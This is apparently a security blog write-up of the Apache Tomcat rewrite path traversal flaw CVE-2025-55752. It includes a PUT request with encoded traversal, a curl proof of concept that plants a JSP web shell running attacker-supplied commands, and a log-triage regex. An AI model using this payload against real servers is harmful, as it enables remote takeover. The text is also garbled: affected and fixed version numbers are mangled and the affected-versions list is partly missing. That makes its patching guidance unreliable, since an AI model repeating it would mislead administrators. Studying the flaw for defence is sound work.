CVE-2025-55752 - Apache Tomcat Relative Path Traversal Vulnerability – Exploit, Impact, and Practical Guidance

A dangerous new security hole—CVE-2025-55752—has been discovered in Apache Tomcat, one of the world’s most popular Java application servers. This vulnerability opens the door for attackers to bypass core security checks and, under the right conditions, write malicious files to sensitive server locations, potentially leading to full remote code execution.

In this post, we’ll walk through what happened, demonstrate the bug, and show you how to check if you’re vulnerable. We’ve kept the language as simple and direct as possible for everyone to understand, from admins to curious developers.

What is CVE-2025-55752?

CVE-2025-55752 is a relative path traversal vulnerability in Tomcat’s URL rewrite handling, introduced as an unintended side effect of the fix for bug 60013.

Because of how Tomcat now normalizes the rewritten URL before decoding it, attackers can sneak encoded traversal sequences past Tomcat’s built-in protections and manipulate which files the server accesses or writes. This becomes particularly dangerous when HTTP PUT is enabled, letting an attacker upload files anywhere they want in certain directory structures.

Plus older EOL versions: 8.5.6 through 8.5.100

Safe Versions:
Upgrade to: 11..11, 10.1.45, or 9..109+
Official Tomcat Security Advisory

How the Exploit Works

Tomcat protects critical directories like /WEB-INF/ and /META-INF/ by default. These folders aren't supposed to be accessible from outside the server.

Previously, if a user tried to access something like GET /WEB-INF/web.xml, Tomcat would block the request.

But because of this bug, if you manipulate the URL in a special way (using encoded paths—e.g., %2e%2e/ for ../—and rewrite rules that move query parameters to the URI), Tomcat first simplifies the path, then decodes it. This sequence lets the traversal slip past the security checks.

Suppose you have a Tomcat server with the following rewrite rule (Tomcat's Rewrite Valve uses mod_rewrite-style syntax, so this applies to either):

<!-- Example rewrite: moves ?file=target to /downloads/target -->
RewriteCond %{QUERY_STRING} file=(.+)
RewriteRule ^/download /downloads/%1 [QSA,L]

Now, let's say PUT is enabled for trusted users, but an attacker finds a way to send

PUT /download?file=..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1
Host: target-app
Content-Length: 16

malicious content

Because of the bug:
1. Tomcat's URL rewriting moves the query param into the path: /downloads/..%2f..%2fWEB-INF%2fweb.xml.
2. Tomcat *normalizes* the path; since the encoded ..%2f.. is still a single opaque segment, nothing is collapsed and the path looks safe.
3. Then, it decodes the %2f to /, resulting in /downloads/../../WEB-INF/web.xml.
4. That path is resolved as /WEB-INF/web.xml, and Tomcat misses the chance to block it.

The malicious content is uploaded directly into this protected location.

In effect, this means an attacker can overwrite or upload files anywhere the Tomcat process has write permission!
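To make the ordering concrete, here is an added Python model (not Tomcat's code and not from the advisory) of the normalize-before-decode sequence described above, placed beside the corrected decode-before-normalize order, plus a small access-log triage helper for the audit step recommended in the checklist below. The rewrite, normalize and is_protected functions are simplified stand-ins for Tomcat's own logic, and the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")

def rewrite(target: str) -> str:
    """Model of the page's rule: /download?file=X -> /downloads/X, with X copied undecoded."""
    path, _, query = target.partition("?")
    m = re.search(r"(?:^|&)file=([^&]+)", query)
    return "/downloads/" + m.group(1) if path == "/download" and m else path

def normalize(path: str) -> str:
    """Collapse '.' and '..' segments; '..' above the root is dropped (stand-in for Tomcat's step)."""
    return posixpath.normpath(path)

def is_protected(path: str) -> bool:
    """Simplified stand-in for Tomcat's built-in /WEB-INF and /META-INF check."""
    return path.upper().startswith(PROTECTED_PREFIXES)

def resolve_vulnerable(target: str):
    """Flawed order: normalize, check, then decode. Returns the path the file layer
    finally resolves, or None if the request was blocked."""
    checked = normalize(rewrite(target))   # '..%2f..%2f' is one opaque segment, nothing to collapse
    if is_protected(checked):
        return None
    return normalize(unquote(checked))     # decoding reveals '../..', resolved only after the check

def resolve_fixed(target: str):
    """Corrected order: decode first, then normalize and check."""
    checked = normalize(unquote(rewrite(target)))
    return None if is_protected(checked) else checked

TRAVERSAL = re.compile(r"(?:%2e|\.){2}(?:%2f|%5c|/)", re.IGNORECASE)

def suspicious_put_requests(log_lines):
    """Triage helper for the access-log check: PUT targets carrying a '../' in any encoding."""
    hits = []
    for line in log_lines:
        m = re.search(r'"PUT (\S+) HTTP/', line)
        if m and TRAVERSAL.search(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Oct/2025:18:15:42 +0000] "PUT /download?file=..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1" 204 -',
    '10.0.0.6 - - [27/Oct/2025:18:16:01 +0000] "GET /download?file=report.pdf HTTP/1.1" 200 5120',
    '10.0.0.7 - - [27/Oct/2025:18:16:30 +0000] "PUT /download?file=notes.txt HTTP/1.1" 204 -',
]
```

Note that a plain ../ in the query is caught even by the flawed order, because normalization collapses it before the check; only the encoded form slips through.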

Code Snippet: Minimal Proof of Concept

Below is a sample exploit script using curl that writes a web shell to a protected directory (assuming all the right misconfigurations are in place):

curl -X PUT "http://victim.com/download?file=..%2f..%2fwebapps%2fROOT%2fshell.jsp" \
     -d '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>' \
     -H "Content-Type: application/octet-stream"

If /download is rewritten to /downloads/<value> as above, this request drops a simple web shell at /webapps/ROOT/shell.jsp!

You (or an attacker) can now run commands by visiting

http://victim.com/shell.jsp?cmd=whoami

Disclaimer: Only test on systems you own!
Enabling PUT is rare, but if it’s on and you use rewrite rules that manipulate URIs, you’re in big trouble!

How to Check if You're Vulnerable

1. Are you running Tomcat 9...M11 through 9..108, 10.1.-M1 through 10.1.44, or 11..-M1 through 11..10?
2. Is PUT enabled (even for a single endpoint)?
3. Did you ever restrict access to /WEB-INF/, /META-INF/, or other secret directories by relying solely on Tomcat’s built-in checks?

If YES to any, you may be at risk. Audit your access logs for unusual PUT requests and test the exploit in a staging environment.

- Tomcat Security CVEs
- Bug 60013 - Original Regression
- Tomcat Changelog
- Relative Path Traversal (OWASP)

How to Fix

- Upgrade Tomcat to one of the safe versions listed above.
- Audit and harden rewrite rules.
- Block access to /WEB-INF/ and /META-INF/ at the web server/proxy layer with strict rules.

Summary

CVE-2025-55752 is a prime example of how small issues in request handling can create major risk. Tomcat users, especially those with custom rewrite rules, must patch immediately or risk serious compromise.

Check your versions, inspect your endpoints, and upgrade today.

*This write-up is exclusive—please share responsibly and patch your servers!*

For any questions or deeper technical details, visit the official Apache Tomcat security page. Stay safe!

Timeline

Published on: 10/27/2025 18:15:42 UTC
Last modified on: 11/14/2025 17:44:41 UTC